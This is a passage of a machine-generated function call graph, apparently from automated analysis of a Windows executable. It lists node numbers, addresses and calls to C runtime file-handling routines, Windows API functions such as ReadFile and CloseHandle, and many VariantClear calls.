87298->87336 87299 41e296 87335 417f8a 46 API calls __getptd_noexit 87299->87335 87302->87238 87303->87252 87304->87263 87305->87263 87306->87269 87307->87274 87308->87276 87310 41ae62 __write 87309->87310 87311 41aebc 87310->87311 87313 4182cb __lock 46 API calls 87310->87313 87312 41aec1 EnterCriticalSection 87311->87312 87314 41aede __write 87311->87314 87312->87314 87315 41ae8e 87313->87315 87314->87291 87316 41aeaa 87315->87316 87317 41ae97 InitializeCriticalSectionAndSpinCount 87315->87317 87318 41aeec ___lock_fhandle LeaveCriticalSection 87316->87318 87317->87316 87318->87311 87320 41aded __lseeki64_nolock 46 API calls 87319->87320 87321 41e18e 87320->87321 87322 41e1a4 SetFilePointer 87321->87322 87323 41e194 87321->87323 87324 41e1bb GetLastError 87322->87324 87326 41e1c3 87322->87326 87325 417f77 __wsplitpath_helper 46 API calls 87323->87325 87324->87326 87327 41e199 87325->87327 87326->87327 87328 417f9d __dosmaperr 46 API calls 87326->87328 87327->87298 87328->87327 87329->87283 87330->87295 87331->87287 87332->87290 87333->87295 87334->87299 87335->87298 87336->87295 87338 4149ea 87337->87338 87340 4149fe 87337->87340 87383 417f77 46 API calls __getptd_noexit 87338->87383 87341 4149fa 87340->87341 87343 41443c __flush 77 API calls 87340->87343 87355 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 87341->87355 87342 4149ef 87384 417f25 10 API calls __wsplitpath_helper 87342->87384 87345 414a0a 87343->87345 87356 41d8c2 87345->87356 87348 414139 __fclose_nolock 46 API calls 87349 414a18 87348->87349 87360 41d7fe 87349->87360 87351 414a1e 87351->87341 87352 413748 _free 46 API calls 87351->87352 87352->87341 87353->87084 87354->87089 87355->87089 87357 414a12 87356->87357 87358 41d8d2 87356->87358 87357->87348 87358->87357 87359 413748 _free 46 API calls 87358->87359 87359->87357 87361 41d80a __write 87360->87361 87362 41d812 87361->87362 87363 41d82d 87361->87363 87400 417f8a 46 API calls __getptd_noexit 87362->87400 87365 41d839 87363->87365 87369 41d873 87363->87369 87402 417f8a 46 API calls __getptd_noexit 87365->87402 87367 41d817 87401 417f77 46 API calls __getptd_noexit 87367->87401 87368 41d83e 87403 417f77 46 API calls __getptd_noexit 87368->87403 87372 41ae56 ___lock_fhandle 48 API calls 87369->87372 87375 41d879 87372->87375 87373 41d81f __write 87373->87351 87374 41d846 87404 417f25 10 API calls __wsplitpath_helper 87374->87404 87377 41d893 87375->87377 87378 41d887 87375->87378 87405 417f77 46 API calls __getptd_noexit 87377->87405 87385 41d762 87378->87385 87381 41d88d 87406 41d8ba LeaveCriticalSection __unlock_fhandle 87381->87406 87383->87342 87384->87341 87407 41aded 87385->87407 87387 41d7c8 87420 41ad67 47 API calls 2 library calls 87387->87420 87388 41d772 87388->87387 87389 41d7a6 87388->87389 87391 41aded __lseeki64_nolock 46 API calls 87388->87391 87389->87387 87392 41aded __lseeki64_nolock 46 API calls 87389->87392 87395 41d79d 87391->87395 87396 41d7b2 CloseHandle 87392->87396 87393 41d7d0 87394 41d7f2 87393->87394 87421 417f9d 46 API calls 3 library calls 87393->87421 87394->87381 87398 41aded __lseeki64_nolock 46 API calls 87395->87398 87396->87387 87399 41d7be GetLastError 87396->87399 87398->87389 87399->87387 87400->87367 87401->87373 87402->87368 87403->87374 87404->87373 87405->87381 87406->87373 87408 41ae12 87407->87408 87409 41adfa 87407->87409 87412 417f8a __write 46 API calls 87408->87412 87413 41ae51 87408->87413 87410 417f8a __write 46 API calls 87409->87410 87411 41adff 87410->87411 87414 417f77 __wsplitpath_helper 46 API calls 87411->87414 87415 41ae23 87412->87415 87413->87388 87419 41ae07 87414->87419 87416 417f77 __wsplitpath_helper 46 API calls 87415->87416 87417 41ae2b 87416->87417 87418 417f25 __wsplitpath_helper 10 API calls 87417->87418 87418->87419 87419->87388 87420->87393 87421->87394 87423 414c82 __write 87422->87423 87424 414cc3 87423->87424 87425 414c96 __call_reportfault 87423->87425 87434 414cbb __write 87423->87434 87426 415471 __lock_file 47 API calls 87424->87426 87449 417f77 46 API calls __getptd_noexit 87425->87449 87428 414ccb 87426->87428 87435 414aba 87428->87435 87430 414cb0 87450 417f25 10 API calls __wsplitpath_helper 87430->87450 87434->87093 87436 414af2 87435->87436 87439 414ad8 __call_reportfault 87435->87439 87451 414cfa LeaveCriticalSection LeaveCriticalSection __wfsopen 87436->87451 87437 414ae2 87502 417f77 46 API calls __getptd_noexit 87437->87502 87439->87436 87439->87437 87442 414b2d 87439->87442 87442->87436 87443 414c38 __call_reportfault 87442->87443 87444 414139 __fclose_nolock 46 API calls 87442->87444 87452 41dfcc 87442->87452 87482 41d8f3 87442->87482 87504 41e0c2 46 API calls 3 library calls 87442->87504 87505 417f77 46 API calls __getptd_noexit 87443->87505 87444->87442 87448 414ae7 87503 417f25 10 API calls __wsplitpath_helper 87448->87503 87449->87430 87450->87434 87451->87434 87453 41dfd8 __write 87452->87453 87454 41dfe0 87453->87454 87455 41dffb 87453->87455 87575 417f8a 46 API calls __getptd_noexit 87454->87575 87457 41e007 87455->87457 87460 41e041 87455->87460 87577 417f8a 46 API calls __getptd_noexit 87457->87577 87458 41dfe5 87576 417f77 46 API calls __getptd_noexit 87458->87576 87463 41e063 87460->87463 87464 41e04e 87460->87464 87462 41e00c 87578 417f77 46 API calls __getptd_noexit 87462->87578 87467 41ae56 ___lock_fhandle 48 API calls 87463->87467 87580 417f8a 46 API calls __getptd_noexit 87464->87580 87470 41e069 87467->87470 87468 41e014 87579 417f25 10 API calls __wsplitpath_helper 87468->87579 87469 41e053 87581 417f77 46 API calls __getptd_noexit 87469->87581 87473 41e077 87470->87473 87474 41e08b 87470->87474 87472 41dfed __write 87472->87442 87506 41da15 87473->87506 87582 417f77 46 API calls __getptd_noexit 87474->87582 87478 41e090 87583 417f8a 46 API calls __getptd_noexit 87478->87583 87479 41e083 87584 41e0ba LeaveCriticalSection __unlock_fhandle 87479->87584 87483 41d900 87482->87483 87487 41d915 87482->87487 87588 417f77 46 API calls __getptd_noexit 87483->87588 87485 41d905 87589 417f25 10 API calls __wsplitpath_helper 87485->87589 87488 41d94a 87487->87488 87494 41d910 87487->87494 87585 420603 87487->87585 87490 414139 __fclose_nolock 46 API calls 87488->87490 87491 41d95e 87490->87491 87492 41dfcc __read 59 API calls 87491->87492 87493 41d965 87492->87493 87493->87494 87495 414139 __fclose_nolock 46 API calls 87493->87495 87494->87442 87496 41d988 87495->87496 87496->87494 87497 414139 __fclose_nolock 46 API calls 87496->87497 87498 41d994 87497->87498 87498->87494 87499 414139 __fclose_nolock 46 API calls 87498->87499 87500 41d9a1 87499->87500 87501 414139 __fclose_nolock 46 API calls 87500->87501 87501->87494 87502->87448 87503->87436 87504->87442 87505->87448 87507 41da31 87506->87507 87508 41da4c 87506->87508 87509 417f8a __write 46 API calls 87507->87509 87510 41da5b 87508->87510 87512 41da7a 87508->87512 87511 41da36 87509->87511 87513 417f8a __write 46 API calls 87510->87513 87515 417f77 __wsplitpath_helper 46 API calls 87511->87515 87514 41da98 87512->87514 87529 41daac 87512->87529 87516 41da60 87513->87516 87517 417f8a __write 46 API calls 87514->87517 87526 41da3e 87515->87526 87519 417f77 __wsplitpath_helper 46 API calls 87516->87519 87521 41da9d 87517->87521 87518 41db02 87520 417f8a __write 46 API calls 87518->87520 87522 41da67 87519->87522 87524 41db07 87520->87524 87525 417f77 __wsplitpath_helper 46 API calls 87521->87525 87523 417f25 __wsplitpath_helper 10 API calls 87522->87523 87523->87526 87527 417f77 __wsplitpath_helper 46 API calls 87524->87527 87528 41daa4 87525->87528 87526->87479 87527->87528 87532 417f25 __wsplitpath_helper 10 API calls 87528->87532 87529->87518 87529->87526 87530 41dae1 87529->87530 87531 41db1b 87529->87531 87530->87518 87537 41daec ReadFile 87530->87537 87534 416b04 __malloc_crt 46 API calls 87531->87534 87532->87526 87538 41db31 87534->87538 87535 41dc17 87536 41df8f GetLastError 87535->87536 87544 41dc2b 87535->87544 87539 41de16 87536->87539 87540 41df9c 87536->87540 87537->87535 87537->87536 87541 41db59 87538->87541 87542 41db3b 87538->87542 87548 417f9d __dosmaperr 46 API calls 87539->87548 87554 41dd9b 87539->87554 87546 417f77 __wsplitpath_helper 46 API calls 87540->87546 87545 420494 __lseeki64_nolock 48 API calls 87541->87545 87543 417f77 __wsplitpath_helper 46 API calls 87542->87543 87547 41db40 87543->87547 87544->87554 87555 41dc47 87544->87555 87558 41de5b 87544->87558 87549 41db67 87545->87549 87550 41dfa1 87546->87550 87552 417f8a __write 46 API calls 87547->87552 87548->87554 87549->87537 87551 417f8a __write 46 API calls 87550->87551 87551->87554 87552->87526 87553 413748 _free 46 API calls 87553->87526 87554->87526 87554->87553 87556 41dcab ReadFile 87555->87556 87565 41dd28 87555->87565 87559 41dcc9 GetLastError 87556->87559 87567 41dcd3 87556->87567 87557 41ded0 ReadFile 87560 41deef GetLastError 87557->87560 87568 41def9 87557->87568 87558->87554 87558->87557 87559->87555 87559->87567 87560->87558 87560->87568 87561 41ddec MultiByteToWideChar 87561->87554 87562 41de10 GetLastError 87561->87562 87562->87539 87563 41dda3 87570 41dd60 87563->87570 87571 41ddda 87563->87571 87564 41dd96 87566 417f77 __wsplitpath_helper 46 API calls 87564->87566 87565->87554 87565->87563 87565->87564 87565->87570 87566->87554 87567->87555 87572 420494 __lseeki64_nolock 48 API calls 87567->87572 87568->87558 87569 420494 __lseeki64_nolock 48 API calls 87568->87569 87569->87568 87570->87561 87573 420494 __lseeki64_nolock 48 API calls 87571->87573 87572->87567 87574 41dde9 87573->87574 87574->87561 87575->87458 87576->87472 87577->87462 87578->87468 87579->87472 87580->87469 87581->87468 87582->87478 87583->87479 87584->87472 87586 416b04 __malloc_crt 46 API calls 87585->87586 87587 420618 87586->87587 87587->87488 87588->87485 87589->87494 87593 4148b3 GetSystemTimeAsFileTime __aulldiv 87590->87593 87592 442c6b 87592->87096 87593->87592 87594->87103 87595->87109 87596->87109 87601 45272f __tzset_nolock _wcscpy 87597->87601 87598 44afef GetSystemTimeAsFileTime 87598->87601 87599 414d04 61 API calls __fread_nolock 87599->87601 87600 4528a4 87600->87018 87600->87019 87601->87598 87601->87599 87601->87600 87602 4150d1 81 API calls _fseek 87601->87602 87602->87601 87604 44b1bc 87603->87604 87605 44b1ca 87603->87605 87606 4149c2 116 API calls 87604->87606 87607 44b1e1 87605->87607 87608 44b1d8 87605->87608 87609 4149c2 116 API calls 87605->87609 87606->87605 87638 4321a4 87607->87638 87608->87047 87610 44b2db 87609->87610 87610->87607 87612 44b2e9 87610->87612 87614 44b2f6 87612->87614 87617 414a46 __fcloseall 82 API calls 87612->87617 87613 44b224 87615 44b253 87613->87615 87616 44b228 87613->87616 87614->87047 87642 43213d 87615->87642 87619 44b235 87616->87619 87621 414a46 __fcloseall 82 API calls 87616->87621 87617->87614 87622 44b245 87619->87622 87623 414a46 __fcloseall 82 API calls 87619->87623 87620 44b25a 87624 44b260 87620->87624 87625 44b289 87620->87625 87621->87619 87622->87047 87623->87622 87627 44b26d 87624->87627 87629 414a46 __fcloseall 82 API calls 87624->87629 87652 44b0bf 87 API calls 87625->87652 87630 44b27d 87627->87630 87632 414a46 __fcloseall 82 API calls 87627->87632 87628 44b28f 87653 4320f8 46 API calls _free 87628->87653 87629->87627 87630->87047 87632->87630 87633 44b295 87634 44b2a2 87633->87634 87635 414a46 __fcloseall 82 API calls 87633->87635 87636 44b2b2 87634->87636 87637 414a46 __fcloseall 82 API calls 87634->87637 87635->87634 87636->87047 87637->87636 87639 4321cb 87638->87639 87641 4321b4 __tzset_nolock _memmove 87638->87641 87640 414d04 __fread_nolock 61 API calls 87639->87640 87640->87641 87641->87613 87643 4135bb _malloc 46 API calls 87642->87643 87644 432150 87643->87644 87645 4135bb _malloc 46 API calls 87644->87645 87646 432162 87645->87646 87647 4135bb _malloc 46 API calls 87646->87647 87648 432174 87647->87648 87651 432189 87648->87651 87654 4320f8 46 API calls _free 87648->87654 87650 432198 87650->87620 87651->87620 87652->87628 87653->87633 87654->87650 87655->86949 87656->86950 87657->86966 87658->86966 87659->86966 87660->86960 87661->86966 87662->86966 87663->86973 87664->86982 87665->86984 87666->86984 87716 410160 87667->87716 87669 41012f GetFullPathNameW 87670 410147 moneypunct 87669->87670 87670->86803 87672 4102cb SHGetDesktopFolder 87671->87672 87675 410333 _wcsncpy 87671->87675 87673 4102e0 _wcsncpy 87672->87673 87672->87675 87674 41031c SHGetPathFromIDListW 87673->87674 87673->87675 87674->87675 87675->86807 87677 425f4a 87676->87677 87678 4101bb 87676->87678 87681 4114ab __wcsicoll 58 API calls 87677->87681 87684 425f6e 87677->87684 87679 410160 52 API calls 87678->87679 87680 4101c7 87679->87680 87720 410200 52 API calls 2 library calls 87680->87720 87681->87677 87683 4101d6 87721 410200 52 API calls 2 library calls 87683->87721 87684->86809 87686 4101e9 87686->86809 87688 40f760 128 API calls 87687->87688 87689 40f584 87688->87689 87690 429335 87689->87690 87691 40f58c 87689->87691 87692 4528bd 118 API calls 87690->87692 87693 40f598 87691->87693 87694 429358 87691->87694 87695 42934b 87692->87695 87739 4033c0 113 API calls 7 library calls 87693->87739 87740 434034 86 API calls _wprintf 87694->87740 87699 429373 87695->87699 87700 42934f 87695->87700 87698 40f5b4 87698->86806 87703 4115d7 52 API calls 87699->87703 87702 431e58 82 API calls 87700->87702 87701 429369 87701->87699 87702->87694 87715 4293c5 moneypunct 87703->87715 87704 42959c 87705 413748 _free 46 API calls 87704->87705 87706 4295a5 87705->87706 87707 431e58 82 API calls 87706->87707 87708 4295b1 87707->87708 87712 401b10 52 API calls 87712->87715 87715->87704 87715->87712 87722 444af8 87715->87722 87725 402780 87715->87725 87733 4022d0 87715->87733 87741 44c7dd 64 API calls 3 library calls 87715->87741 87742 44b41c 52 API calls 87715->87742 87717 410167 _wcslen 87716->87717 87718 4115d7 52 API calls 87717->87718 87719 41017e _wcscpy 87718->87719 87719->87669 87720->87683 87721->87686 87723 4115d7 52 API calls 87722->87723 87724 444b27 _memmove 87723->87724 87724->87715 87726 402827 87725->87726 87729 402790 moneypunct _memmove 87725->87729 87728 4115d7 52 API calls 87726->87728 87727 4115d7 52 API calls 87730 402797 87727->87730 87728->87729 87729->87727 87731 4115d7 52 API calls 87730->87731 87732 4027bd 87730->87732 87731->87732 87732->87715 87734 4022e0 87733->87734 87736 40239d 87733->87736 87735 4115d7 52 API calls 87734->87735 87734->87736 87737 402320 moneypunct 87734->87737 87735->87737 87736->87715 87737->87736 87738 4115d7 52 API calls 87737->87738 87738->87737 87739->87698 87740->87701 87741->87715 87742->87715 87744 402417 87743->87744 87748 402539 moneypunct 87743->87748 87745 4115d7 52 API calls 87744->87745 87744->87748 87746 402443 87745->87746 87747 4115d7 52 API calls 87746->87747 87750 4024b4 87747->87750 87748->86813 87750->87748 87751 4022d0 52 API calls 87750->87751 87772 402880 95 API calls 2 library calls 87750->87772 87751->87750 87756 401566 87752->87756 87753 401794 87773 40e9a0 90 API calls 87753->87773 87756->87753 87757 4010a0 52 API calls 87756->87757 87758 40167a 87756->87758 87757->87756 87759 4017c0 87758->87759 87774 45e737 90 API calls 3 library calls 87758->87774 87759->86816 87761 40bc70 52 API calls 87760->87761 87770 40d451 87761->87770 87762 40d50f 87777 410600 52 API calls 87762->87777 87764 427c01 87778 45e737 90 API calls 3 library calls 87764->87778 87765 40e0a0 52 API calls 87765->87770 87767 401b10 52 API calls 87767->87770 87768 40d519 87768->86818 87770->87762 87770->87764 87770->87765 87770->87767 87770->87768 87775 40f310 53 API calls 87770->87775 87776 40d860 91 API calls 87770->87776 87772->87750 87773->87758 87774->87759 87775->87770 87776->87770 87777->87768 87778->87768 87779->86831 87780->86832 87782 4091c6 87781->87782 87783 42c5fe 87781->87783 87782->86893 87783->87782 87784 40bc70 52 API calls 87783->87784 87785 42c64e InterlockedIncrement 87784->87785 87786 42c665 87785->87786 87791 42c697 87785->87791 87789 42c672 InterlockedDecrement Sleep InterlockedIncrement 87786->87789 87786->87791 87787 42c737 InterlockedDecrement 87788 42c74a 87787->87788 87792 408f40 VariantClear 87788->87792 87789->87786 87789->87791 87790 42c731 87790->87787 87791->87787 87791->87790 88065 408e80 87791->88065 87794 42c752 87792->87794 88074 410c60 VariantClear moneypunct 87794->88074 87798 42c6db 87799 402160 52 API calls 87798->87799 87800 42c6e5 87799->87800 88070 45340c 85 API calls 87800->88070 87802 42c6f1 88071 40d200 52 API calls 2 library calls 87802->88071 87804 42c6fb 88072 465124 53 API calls 87804->88072 87806 42c715 87807 42c76a 87806->87807 87808 42c719 87806->87808 87810 401b10 52 API calls 87807->87810 88073 46fe32 VariantClear 87808->88073 87811 42c77e 87810->87811 87812 401980 53 API calls 87811->87812 87818 42c796 87812->87818 87813 42c812 88076 46fe32 VariantClear 87813->88076 87815 42c82a InterlockedDecrement 88077 46ff07 54 API calls 87815->88077 87817 42c864 88078 45e737 90 API calls 3 library calls 87817->88078 87818->87813 87818->87817 88075 40ba10 52 API calls 2 library calls 87818->88075 87820 42c9ec 88121 47d33e 331 API calls 87820->88121 87823 42c9fe 88122 46feb1 VariantClear VariantClear 87823->88122 87825 401980 53 API calls 87836 42c849 87825->87836 87826 408f40 VariantClear 87826->87836 87827 42ca08 87829 401b10 52 API calls 87827->87829 87828 42c874 87830 408f40 VariantClear 87828->87830 87838 42ca59 87828->87838 87832 42ca15 87829->87832 87831 42c891 87830->87831 88079 410c60 VariantClear moneypunct 87831->88079 87834 40c2c0 52 API calls 87832->87834 87834->87828 87835 402780 52 API calls 87835->87836 87836->87820 87836->87825 87836->87826 87836->87835 88080 40a780 87836->88080 87838->87838 87840 40afc4 87839->87840 87841 40b156 87839->87841 87843 40afd5 87840->87843 87848 42d1e3 87840->87848 88132 45e737 90 API calls 3 library calls 87841->88132 87847 40a780 194 API calls 87843->87847 87861 40b11a moneypunct 87843->87861 87845 42d1f8 87852 408f40 VariantClear 87845->87852 87846 40b143 87846->86893 87850 40b00a 87847->87850 88133 45e737 90 API calls 3 library calls 87848->88133 87850->87845 87853 40b012 87850->87853 87851 42d4db 87851->87851 87852->87846 87854 40b04a 87853->87854 87855 40b094 moneypunct 87853->87855 87857 42d231 VariantClear 87853->87857 87863 40b05c moneypunct 87854->87863 88134 40e270 VariantClear moneypunct 87854->88134 87856 40b108 87855->87856 87860 42d425 moneypunct 87855->87860 87856->87861 88135 40e270 VariantClear moneypunct 87856->88135 87857->87863 87858 42d45a VariantClear 87858->87861 87860->87858 87860->87861 87861->87846 88136 45e737 90 API calls 3 library calls 87861->88136 87862 4115d7 52 API calls 87862->87855 87863->87855 87863->87862 87866 40900d 87865->87866 87867 408fff 87865->87867 87870 42c3f6 87866->87870 87872 42c44a 87866->87872 87873 40a780 194 API calls 87866->87873 87876 42c47b 87866->87876 87877 42c4cb 87866->87877 87878 42c564 87866->87878 87882 42c548 87866->87882 87885 409112 87866->87885 87887 42c528 87866->87887 87889 4090df 87866->87889 87890 4090ea 87866->87890 87899 4090f2 moneypunct 87866->87899 88139 4534e3 52 API calls 87866->88139 88141 40c4e0 194 API calls 87866->88141 88137 403ea0 52 API calls __cinit 87867->88137 88140 45e737 90 API calls 3 library calls 87870->88140 88142 45e737 90 API calls 3 library calls 87872->88142 87873->87866 88143 451b42 61 API calls 87876->88143 88145 47faae 233 API calls 87877->88145 87883 408f40 VariantClear 87878->87883 87880 42c491 87880->87899 88144 45e737 90 API calls 3 library calls 87880->88144 88148 45e737 90 API calls 3 library calls 87882->88148 87883->87899 87884 42c4da 87884->87899 88146 45e737 90 API calls 3 library calls 87884->88146 87885->87882 87892 40912b 87885->87892 88147 45e737 90 API calls 3 library calls 87887->88147 87889->87890 87894 408e80 VariantClear 87889->87894 87895 408f40 VariantClear 87890->87895 87892->87899 88138 403e10 53 API calls 87892->88138 87894->87890 87895->87899 87897 40914b 87898 408f40 VariantClear 87897->87898 87898->87899 87899->86893 88149 408d90 87900->88149 87902 429778 88178 410c60 VariantClear moneypunct 87902->88178 87904 408cf9 87904->87902 87906 42976c 87904->87906 87908 408d2d 87904->87908 87905 429780 88177 45e737 90 API calls 3 library calls 87906->88177 88165 403d10 87908->88165 87911 408d71 moneypunct 87911->86893 87912 408f40 VariantClear 87913 408d45 moneypunct 87912->87913 87913->87911 87913->87912 87915 4096c6 _wcslen 87914->87915 87916 40a70c moneypunct _memmove 87915->87916 87917 4115d7 52 API calls 87915->87917 87919 4013a0 52 API calls 87916->87919 87918 4096fa _memmove 87917->87918 87920 4115d7 52 API calls 87918->87920 87921 4297aa 87919->87921 87922 40971b 87920->87922 87924 4115d7 52 API calls 87921->87924 87922->87916 87923 409749 CharUpperBuffW 87922->87923 87928 40976a moneypunct 87922->87928 87923->87928 87925 4297d1 _memmove 87924->87925 88484 45e737 90 API calls 3 library calls 87925->88484 87973 4097e5 moneypunct 87928->87973 88458 47dcbb 196 API calls 87928->88458 87929 42a452 87930 408f40 VariantClear 87929->87930 87931 42ae92 87930->87931 88485 410c60 VariantClear moneypunct 87931->88485 87933 42aea4 87934 409aa2 87934->87925 87936 4115d7 52 API calls 87934->87936 87940 409afe 87934->87940 87935 40a689 87937 4115d7 52 API calls 87935->87937 87936->87940 87954 40a6af moneypunct _memmove 87937->87954 87938 409b2a 87942 429dbe 87938->87942 88000 409b4d moneypunct _memmove 87938->88000 88466 40b400 VariantClear VariantClear moneypunct 87938->88466 87939 40c2c0 52 API calls 87939->87973 87940->87938 87941 4115d7 52 API calls 87940->87941 87943 429d31 87941->87943 87948 429dd3 87942->87948 88467 40b400 VariantClear VariantClear moneypunct 87942->88467 87947 429d42 87943->87947 88463 44a801 52 API calls 87943->88463 87944 429a46 VariantClear 87944->87973 87945 409fd2 87952 40a045 87945->87952 88002 42a3f5 87945->88002 87959 40e0a0 52 API calls 87947->87959 87948->88000 88468 40e1c0 VariantClear moneypunct 87948->88468 87949 408f40 VariantClear 87949->87973 87956 4115d7 52 API calls 87952->87956 87963 4115d7 52 API calls 87954->87963 87964 40a04c 87956->87964 87957 4115d7 52 API calls 87957->87973 87965 429d57 87959->87965 87961 42a42f 88472 45e737 90 API calls 3 library calls 87961->88472 87963->87916 87966 40a0a7 87964->87966 87970 4091e0 317 API calls 87964->87970 88464 453443 52 API calls 87965->88464 87985 40a0af 87966->87985 88473 40c790 VariantClear moneypunct 87966->88473 87967 4299d9 87972 408f40 VariantClear 87967->87972 87969 429d88 88465 453443 52 API calls 87969->88465 87970->87966 87971 429abd 87971->86893 87974 4299e2 87972->87974 87973->87925 87973->87929 87973->87934 87973->87935 87973->87939 87973->87944 87973->87949 87973->87954 87973->87957 87973->87967 87973->87971 87978 40a780 194 API calls 87973->87978 88459 40c4e0 194 API calls 87973->88459 88461 40ba10 52 API calls 2 library calls 87973->88461 88462 40e270 VariantClear moneypunct 87973->88462 88460 410c60 VariantClear moneypunct 87974->88460 87978->87973 87981 402780 52 API calls 87981->88000 87983 408f40 VariantClear 88015 40a162 moneypunct _memmove 87983->88015 87984 41130a 51 API calls __cinit 87984->88000 87986 40a11b 87985->87986 87987 42a4b4 VariantClear 87985->87987 87985->88015 87994 40a12d moneypunct 87986->87994 88474 40e270 VariantClear moneypunct 87986->88474 87987->87994 87988 40a780 194 API calls 87988->88000 87989 4115d7 52 API calls 87989->88000 87991 401980 53 API calls 87991->88000 87992 408e80 VariantClear 87992->88000 87993 4115d7 52 API calls 87993->88015 87994->87993 87994->88015 87995 408e80 VariantClear 87995->88015 87997 44a801 52 API calls 87997->88000 87998 42a74d VariantClear 87998->88015 87999 40a368 88001 42aad4 87999->88001 88009 40a397 87999->88009 88000->87916 88000->87945 88000->87961 88000->87981 88000->87984 88000->87988 88000->87989 88000->87991 88000->87992 88000->87997 88000->88002 88005 409c95 88000->88005 88469 45f508 52 API calls 88000->88469 88470 403e10 53 API calls 88000->88470 88477 46fe90 VariantClear VariantClear moneypunct 88001->88477 88471 47390f VariantClear 88002->88471 88003 42a886 VariantClear 88003->88015 88004 42a7e4 VariantClear 88004->88015 88005->86893 88006 40a3ce 88020 40a3d9 moneypunct 88006->88020 88478 40b400 VariantClear VariantClear moneypunct 88006->88478 88008 40e270 VariantClear 88008->88015 88009->88006 88032 40a42c moneypunct 88009->88032 88457 40b400 VariantClear VariantClear moneypunct 88009->88457 88012 4115d7 52 API calls 88012->88015 88013 42abaf 88017 42abd4 VariantClear 88013->88017 88027 40a4ee moneypunct 88013->88027 88014 4115d7 52 API calls 88018 42a5a6 VariantInit VariantCopy 88014->88018 88015->87983 88015->87995 88015->87998 88015->87999 88015->88001 88015->88003 88015->88004 88015->88008 88015->88012 88015->88014 88475 470870 52 API calls 88015->88475 88476 44ccf1 VariantClear moneypunct 88015->88476 88016 40a4dc 88016->88027 88480 40e270 VariantClear moneypunct 88016->88480 88017->88027 88018->88015 88022 42a5c6 VariantClear 88018->88022 88021 40a41a 88020->88021 88025 42ab44 VariantClear 88020->88025 88020->88032 88021->88032 88479 40e270 VariantClear moneypunct 88021->88479 88022->88015 88023 42ac4f 88028 42ac79 VariantClear 88023->88028 88035 40a546 moneypunct 88023->88035 88024 40a534 88024->88035 88481 40e270 VariantClear moneypunct 88024->88481 88025->88032 88027->88023 88027->88024 88028->88035 88029 42ad28 88034 42ad4e VariantClear 88029->88034 88040 40a583 moneypunct 88029->88040 88031 40a571 88031->88040 88482 40e270 VariantClear moneypunct 88031->88482 88032->88013 88032->88016 88034->88040 88035->88029 88035->88031 88037 40a650 moneypunct 88037->86893 88038 42ae0e VariantClear 88038->88040 88040->88037 88040->88038 88483 40e270 VariantClear moneypunct 88040->88483 88041->86893 88042->86893 88043->86893 88044->86842 88045->86848 88046->86893 88047->86893 88048->86893 88049->86893 88050->86899 88051->86899 88052->86899 88053->86899 88054->86899 88055->86899 88056->86899 88058 403cdf 88057->88058 88059 408f40 VariantClear 88058->88059 88060 403ce7 88059->88060 88060->86886 88061->86899 88062->86899 88063->86893 88064->86839 88066 408e94 88065->88066 88067 408e88 88065->88067 88069 45340c 85 API calls 88066->88069 88068 408f40 VariantClear 88067->88068 88068->88066 88069->87798 88070->87802 88071->87804 88072->87806 88073->87790 88074->87782 88075->87818 88076->87815 88077->87836 88078->87828 88079->87782 88081 40a7a6 88080->88081 88082 40ae8c 88080->88082 88084 4115d7 52 API calls 88081->88084 88123 41130a 51 API calls __cinit 88082->88123 88119 40a7c6 moneypunct _memmove 88084->88119 88085 40a86d 88086 40abd1 88085->88086 88104 40a878 moneypunct 88085->88104 88128 45e737 90 API calls 3 library calls 88086->88128 88088 401b10 52 API calls 88088->88119 88089 40b5f0 89 API calls 88089->88119 88090 408e80 VariantClear 88090->88119 88091 42b791 VariantClear 88091->88119 88092 42ba2d VariantClear 88092->88119 88093 408f40 VariantClear 88093->88104 88094 40e270 VariantClear 88094->88119 88095 42b459 VariantClear 88095->88119 88096 40a884 moneypunct 88096->87836 88097 40bc10 53 API calls 88097->88119 88098 408cc0 187 API calls 88098->88119 88099 42b6f6 VariantClear 88099->88119 88101 42bc5b 88101->87836 88102 4530c9 VariantClear 88102->88119 88103 42bb6a 88131 44b92d VariantClear 88103->88131 88104->88093 88104->88096 88105 4115d7 52 API calls 88105->88119 88106 42bbf5 88129 45e737 90 API calls 3 library calls 88106->88129 88108 4115d7 52 API calls 88111 42b5b3 VariantInit VariantCopy 88108->88111 88110 408f40 VariantClear 88110->88119 88113 42b5d7 VariantClear 88111->88113 88111->88119 88113->88119 88115 42bc37 88130 45e737 90 API calls 3 library calls 88115->88130 88118 42bc48 88118->88103 88120 408f40 VariantClear 88118->88120 88119->88085 88119->88086 88119->88088 88119->88089 88119->88090 88119->88091 88119->88092 88119->88094 88119->88095 88119->88097 88119->88098 88119->88099 88119->88102 88119->88103 88119->88105 88119->88106 88119->88108 88119->88110 88119->88115 88124 45308a 53 API calls 88119->88124 88125 470870 52 API calls 88119->88125 88126 457f66 87 API calls __write_nolock 88119->88126 88127 472f47 127 API calls 88119->88127 88120->88103 88121->87823 88122->87827 88123->88119 88124->88119 88125->88119 88126->88119 88127->88119 88128->88103 88129->88103 88130->88118 88131->88101 88132->87848 88133->87845 88134->87863 88135->87861 88136->87851 88137->87866 88138->87897 88139->87866 88140->87899 88141->87866 88142->87899 88143->87880 88144->87899 88145->87884 88146->87899 88147->87899 88148->87878 88150 4289d2 88149->88150 88151 408db3 88149->88151 88181 45e737 90 API calls 3 library calls 88150->88181 88179 40bec0 90 API calls 88151->88179 88154 4289e5 88182 45e737 90 API calls 3 library calls 88154->88182 88155 408e5a 88155->87904 88158 428a05 88159 408f40 VariantClear 88158->88159 88159->88155 88160 40a780 194 API calls 88163 408dc9 88160->88163 88161 408e64 88162 408f40 VariantClear 88161->88162 88162->88155 88163->88154 88163->88155 88163->88158 88163->88160 88163->88161 88164 408f40 VariantClear 88163->88164 88180 40ba10 52 API calls 2 library calls 88163->88180 88164->88163 88166 408f40 VariantClear 88165->88166 88167 403d20 88166->88167 88168 403cd0 VariantClear 88167->88168 88169 403d4d 88168->88169 88172 4013c0 52 API calls 88169->88172 88183 4755ad 88169->88183 88186 467897 88169->88186 88230 40de10 88169->88230 88235 45e17d 88169->88235 88245 46e91c 88169->88245 88170 403d76 88170->87902 88170->87913 88172->88170 88177->87902 88178->87905 88179->88163 88180->88163 88181->88154 88182->88158 88248 475077 88183->88248 88185 4755c0 88185->88170 88187 4678bb 88186->88187 88215 467954 88187->88215 88366 45340c 85 API calls 88187->88366 88188 4115d7 52 API calls 88190 467989 88188->88190 88192 467995 88190->88192 88370 40da60 53 API calls 88190->88370 88191 4678f6 88193 413a0e __wsplitpath 46 API calls 88191->88193 88195 4533eb 85 API calls 88192->88195 88196 4678fc 88193->88196 88197 4679b7 88195->88197 88198 401b10 52 API calls 